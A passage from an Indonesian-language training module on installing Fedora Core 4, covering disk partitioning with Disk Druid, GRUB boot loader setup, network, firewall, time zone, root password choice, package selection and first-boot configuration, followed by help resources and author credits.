digunakan untuk sebuah server. Setiap partisi yang dibuat memiliki mount point
(atau nama untuk partisi tersebut)
Root and /root
Partisi / (root) adalah partisi teratas pada susunan direktroi di linux,
partisi /root (kadang disebut dengan "slash-root"). Sedangkan setiap
user, secara default akan memiliki direktori dibawah /home untuk
administrasi sistem.
Disk Druid merupakan program yang interaktif untuk melakukan editing
terhadap partisi harddisk, program ini mirip fdisk pada windows. Disk Druid
supports terhadap RAID and LVM.
Gambar10. jendela Disk Druid untuk partisi hardisk
Disk Druid akan menunjukkan beberapa menu pilihan, antara lain
New
Pilihan new digunakan untuk membuat partisi baru dari free space (ruang
kosong) di harddisk anda. Di kotak dialog Add partition, tentukan pilihan mount
point dan type dari partisi. Jika anda memiliki lebih dari satu harddisk yang
terpasang, perhatikan ukurannya sebelum melakukan penambahan partisi
sehingga tidak terjadi kesalahan.
7
Illegal Partitions
Pemberian nama partisi /bin/, /dev/, /etc/, /lib/, /proc/, /root/, and /sbin/
dilarang dalam disk Druid, karena partisi tersebut berada pada partisi / (root).
Partisi /boot juga dilarang dalam pemberian nama menggunakan disk Druid
partisi /boot dibuat secara default oleh fedora sebelum konfigurasi volume
akses untuk masing-masing groups.
Edit
Menu Edit digunakan untuk mengedit partisi yang telah ada, baik ukuran, mount
point(nama partisi) atau jenis Partisi (ext2,ext3 atau linux swap).
Partisi Windows
Jangan memberikan label pada partisi windows type NTFS menggunakan
mount point pada instalasi ini, tapi boleh untuk type partisi vfat (FAT16 or
FAT32)
Delete
Pilihan ini digunakan untuk menghapus partisi yang ada, sebelum menghapus
pastikan data telah di backup melalui CD atau pada harddisk yang lain.
Reset
Meu reset digunakan untuk membatalkan semua operasi pengubahan partisi
menggunakan disk druid.
Jika sudah selesai menentukan partisi yang akan digunakan untuk instalasi tekan Next,
untuk menuju tahap selanjutnya.
E. BOOT LOADER
boot loader merupakan sebuah program yang membaca dan menjalankan sistem
operasi yang terinstal di komputer / PC. Fedora Core secara default menggunakan
GRUB sebagai boot loader. Jika kita memiliki lebih dari satu sistem operasi yag
terinstal di komputer, boot loader akan menentukan sistem operasi mana yang
secara default akan dijalankan, dan didalamnya terdapat waktu untuk memilih atau
mengganti sistem mana yang akan dijalankan.
GRUB
Jika kita menginstal GRUB, maka kita bias meng’overwrite’ boot
loader yang ada. Kita harus menginstal GRUB atau boot loader yang
GRUB
lain ke dalam komputer, karena disitulah sistem operasi akan mulai
dijalankan. Jika tidak kita harus mebuat disk boot utuk menjalankan
sebuah sistem operasi.
8
Gambar11. memilih default sistem operasi yang akan dijalankan melalui GRUB
Secara default, instalasi GRUB terletak pada master boot record (MBR), pada root
file system. Untuk mengubah tujuan / tempat instalasi pilihlah tombol Change boot
loader. Apabila dalam sebuah komputer terdapat lebih dari satu sistem operasi,
maka kita dapat mengedit sistem operasi mana yang akan dijadikan default,
melalui grub kita bisa menambah atau menghapus konfigurasi boot loader.
Untuk menambah keamanan dalam penggunaan
personal komputer, maka grub di lengkapi dengan
pasword, sehingga setiap orang yang tidak
memiliki kewenangan untk memakai tidak bisa
menggunakannya.
Figure 7.4. Entering A Boot Password
Memilih “Good Password”
Pilihlah sebuah password yang mudah untuk diingat, namun susah bagi
orang lain untuk menebaknya. Jangan gunakan password tanggal lahir,
anda, orang dekat anda dan sesuatu yang gampang ditebak oleh orang lain.
Lupa Password GRUB
GRUB disimpan dalam file yang terenskripsi, sehingga tidak bisa terbaca
atau dikembalikan(recovered). sehingga apabila lupa password maka boot
dengan cara mode “rescue” dengan mengetikkan linux rescue pada saat
boot.
Dan
ubahlah
password
entry
yang
terletak
pada
/boot/grub/grub.conf.
9
F. NETWORK CONFIGURATION
Pengaturan kartu jaringan (NIC), seperti halnya pada sistem operasi windows, kita
harus mengisikan no IP, network mask, gateway jika menggunakan jaringan dan no
DNS. Namun selain itu ada kalanya kita tidak perlu mengisikan IP dsb, jika jaringan /
networks memiliki servis DHCP (Dynamic Host Configuration Protocol) yang
menyediakan IP secara automatikas ketika komputer booting. Secara default Fedora
Core mengaktifkan semua network interfaces dan mengkonfigurasikannya
menggunakan DHCP. Demikian juga dengan Wireless interfaces akan diaktifkan
menggunakan DHCP, namun banyak wireless networks yang restricted/dibatasi, dan
hanya tersambung pada jaringan yang benar-benar aman.
Gambar 12. Network Configuration
1. Network Devices
Fedora akan menampilkan semua network interfaces yang terdeteksi pada
komputer, masing network interface harus memiliki IP yang unik atau berbeda. Untuk
memberikan no IP secara manual, pada Network Device, pilihlah tombol Edit.
Fedora kemudian akan menampilkan kotak dialog untuk mengkonfigurasi jaringan.
“Deselect” Configure using DHCP, kemudian isikan no IP Address dan Netmask,
kemudian klik tombol OK. Pilihkah Active on Boot, pada checkbox di dalam kotak
sehingga network interface atau kartu jaringan akan aktif ketika mulai booting.
Konfigurasi Modem
Pada saat konfigurasi jaringan menu idak menampilkan modem yang
tersedia. Konfigurasi modem dilakukan setelah proses instalasi selesai.
Dengan menggunakan pilihan Internet Configuration Wizard atau
Cnfiguration
nfiguration.
Network Cnfiguration settings untuk modem tergantung pada Internet
Service Provider (ISP) yang digunakan.
10
2. Computer Hostname
Pada jaringan yang menggunakan servis DHCP, nama komputer (host) dan no IP
akan disediakan oleh servis DHCP. Untuk membeikan nama secara Manual
ketikkan pada text boxk nama komputer atau host. Nama termasuk juga dengan
domain. Misalkan : machine1.example.com. nama host : machine1, nama domain :
example.com.
Nama Host
Pemberian nama host harus unik dan boleh menggunakan karakter atau
bilangan. Nama Host dalam sebuah jaringan tidak boleh sama, karena
bisa menimbulkan konflik dalam jaringan.
G. SECURITY CONFIGURATION
Pengaturan keamanan karena pengaksesan komputer dari jaringan bisa di atur
melalui tahap ini, Jika kita menginstal komputer server mengatur apakah komputer
bisa diiakses secara remote.
Gambar 13. Firewall Configuration
Setelah selesai lanjutkan dengan menekan tombol Next.
1. Firewall
firewall akan mengecek setiap paket yang datang (incoming) dan yang keluar
(outgoing) pada koneksi jaringan. Secara default firewall enabled atau dijalankan,
dengan sedikit perintah kita bisa mengubah servis yang ada dijalankan oleh fedora.
Firewall bisa diabaikan dengan memilih No firewall.
Mengubah Setting Firewall
Untuk mengubah setting pada firewall, pilih menu Desktop-
>System Settings->Security Level and Firewall.
11
G. TIME ZONE SELECTION
Pada bagian ini kita bisa mengatur waktu yang sesuai dengan lokasi kita, untuk
indonesia bagian barat. Arahkan mouse menunjuk pulau jawa (kota Jakarta), pada
bagian kita bsa menggunakan NTP (Network Time Protocol) untuk mengatur waktu
sehingga keakurasian jam bisa terukur.
Gambar 14. Pemilihan zona waktu pada saat Instalasi Fedora
2. Universal Co-ordinated Time (UTC)
Universal Co-ordinated Time juga dikenal dengan Greenwich Mean Time (GMT).
Jika anda menginstal Fedora Core hanya untuk personal komputer, pilihlah
System clock uses UTC. System clock merupakan hardware dari CPU kita,
Fedora Core menggunakan setting timezone untuk menentukan perbedaan
antara (offset) waktu lokal UTC
Pilih Next untuk proses selanjutnya.
H.
SET THE ROOT PASSWORD
Fedora menggunakan root administrasi sistem. account root pada setiap Linux
hanya dibatasi oleh SELinux. account hampir tidak ada batas, sebagai sistem
administrator kadang kita membutuhkan akses yang tidak terbatas untuk
melakukan konfigurasi sistem.
Menggunakan root account
Sedapat mungkin hindari pemakain root saat log in. gunakan user
biasa, kemudian apabila ingin melakukan konfigurasi terhadap
sistem gunakanlah su dengan memasukkan password root.
Penggunaan password minimal 6 karakter untuk menghindari hack, atau
pemakaian oleh orang yang tidak berkepentingan. Berikut ini petunjuk untuk
membuat password yang baik :
12
Gunakan kombinasi uppercase, lowercase, numbers, dan karakter lain.
Jangan gunakan sebuah kata atau nama. Atau tanggal lahir, dan kata-kata
yang orang lain mudah untuk menebak.
Jangan gunakan untuk menggunakan satu password untuk lebih dari satu
sistem. .
Berikut merupakan contoh password yang baik ;
f9*@1Ls99A
HL8$391%%rb
Iwtb,10^th
gambar 16, merupakan form pengisian Password Root. Fedora menunjukkan
dalam bentuk asterik untuk keamanan. Masukkan lagi password untuk
Konfirmasi.
Gambar 15. Pengisisan Password Root
Pilih Next untuk proses selanjutnya.
I.
PEMILIHAN PAKET
Type instalasi Fedora pada awal, akan menentukan paket-paket yag akan di instal
dalam komputer, secara default paket akan dipilih sesuai dengan type instalasi. Kita
bisa merubah paket-paket yang disertakan dalam instalasi, klik Custom dan Fedora
akan menampilkan Package Group Selection. Sehingga akan tampil kotak dialog
Package Managemet, ditunjukkan pada gambar 16.
Mengatur Paket
Setelah selesai instalasi, kita bisa menambah atau mengurangi paket yang
terinstal di dalam komputer. Gunakan Package Management untuk
menambah/mengurangi paket yang terinstal. Klik Desktop System
Desktop->System
Settings->Add/Remove Applications.
Settings Add/Remove Applications
13
Gambar 16. Package Management
1.
Language Support
Fedora Core secara atomatis akan mendukung bahasa yang digunakan saat
instalasi, misalkan bahasa inggris pada saat instalasi ini. Untuk menambah bahasa
yang akan digunakan dalam instalasi ini kita menambah melalui bagian group
Language Support.
Pemilihan Bahasa
Pilihlah bahasa yang ingin diinstal pada bagian ini, penambahan paket
setelah instalasi agak susah dilakukan dan tidak direkomendasikan.
2. Everything or Minimal Installations
Jika kita menginstal dan memilih, Everything, Fedora Core akan menginstalls
seluruh paket yang disediakan dan ini bisa membutuhkan ruang harddisk yang
besar. Sedangkan type Minimal, paket yang diinstal adalah paket-paket penting
untuk menjalankan sistem dan tanpa graphical interface.
Kebutuhan Harddisk
Instalasi dengan memilih Everything membutuhkan ruang hardisk
sekitar 6.9Gb, dan sekitar 175Mb untuk file temporary.
Tekan Next untuk menuju ke step berikutnya.
14
J.
ABOUT TO INSTAL
Untuk menjalalankan proses instalasi tekan Next, sedangkan untuk membatalkan
instalasi matikan komputer dengan menekan tombol power. Sampai tahap ini
instalasi belum dilakukan. Ketika Next ditekan maka, instalasi dijalankan, dan akan
nampak seperti gambar 17.
Gambar 15. Pengisisan Password Root
Gambar 17. Instalasi Fedora
Installing Packages Screen
Setelah Instalsi selesai, pilihlah Reboot untuk merestart komputer. Fedora Core
akan mengeluarkan CD instalasi sebelum komputer reboots.
K.
FIRST BOOT
Setup Agent akan tampil pertama kali sebelum kita memulai menggunakan Fedora
core. Setup Agent digunakan untuk melakukan konfigurasi Tanggal, Display atau
tampilan, user dan soundcard sebelum kita log in.
15
Pertama kali yang perlu di konfigurasi adalah :
1. License Agreement
Pertama yang perlu di konfigurasi adalah, License Agreement, ntuk bisa
menggunakan Fedora kita harus menerima perjanjian dengan menekan tombol Yes,
I agree to the License Agreement, kemudian tekan
Next.
2. Date and time
Jika komputer kita
tidak
terhubung
dengan
akses
Internet access, ataur
waktu dan tanggal
menggunakan
jendela.
3. Display
Setup
Agent
secara
automatis
akan
menidentifikasi
graphics
card (VGA) dan monitor
pada komputer kita. Dan
digunakan
untuk
menentukan Resolusi yang
tepat dan Color Depth
settings.
Jika kita ingin mengubah
setting pada monitor, pilihlah
Configure untuk menunjukkan
jenis monitor (perusahaan
pembuat) yang ada.
16
4. System User
Dibagian ini kita
membuat user yang akan
menggunakan Fedora,
pada jendela ini kita
hanya bisa
menambahkan satu user.
Untuk membuat user
yang lain dilakukan
setelah instalasi.
5.
Sound card
Setup Agent akan secara
automatis mendeteksi sound
card yang ada pada komputer.
Mengubah setting Sound Card
Fedora Core akan mendeteksi sound card, jika kita menambah sound
card. Apabila kita ingin mengubah secara manual klik Desktop System
Desktop->System
Settings->Soundcard Detection.
Settings Soundcard Detection
6. Additional CDs
Pada bagian ini kita bisa menambahkan paket yang tidak ada pada CD instaler Fedora
Core.
17
6.
Finish
Apabila instasi selesai maka tampilan ini akan muncul pada layar komputer kita.
Dan sekarang Fedora Core bisa digunakan.
III.
PENUTUP
Apabila kita mengalami kesulitan menggunakan fedora, gunakan help yang telah
disediakan leh distro ini, atau buka di http://fedora.redhat.com/docs/ atau dapatkan buku
dan tutorial dari The Linux Documentation Project (LDP) di alamat : http://www.tldp.org/
Atau banyak Oraganisasi dan individu yang menyediakan tutorial dan HOWTO untuk
Fedora pada web sitenya. Kita bisa mencari lewat search menggunakan Google di :
http://www.google.com/linux/
Di indonesia, kita bisa mencari di KPLI (Kelompok Pengguna Linux Indonesia) yang
seringkali menuliskan artikel dan tutorial tentang linux. Atau forum-forum diskusi, semisal
www.diskusiweb.com.
*)
Aris Budianto,ST. Penulis adalah Teknisi di Laboratorium Komputer II FKIP UNS. Menulis
beberapa modul pelatihan, antara lain Microsoft Word, Microsoft Power Point, dan Intaslasi Linux
menggunakan Fedora Core4 dan Macromedia Dreamweaver MX.
Modul ini bersifat Open Source : Bebas di edit, disusun ulang dan didistribusikan dengan
catatan harus mencantumkan pembuat modul ini. Dan dilarang mendistribusikan modul
ini untuk kepentingan komersial. Kritik dan saran harap disampaikan ke
anto_xzy@yahoo.com & aris_budianto@yahoo.com. Sukron, jzkl.
18
x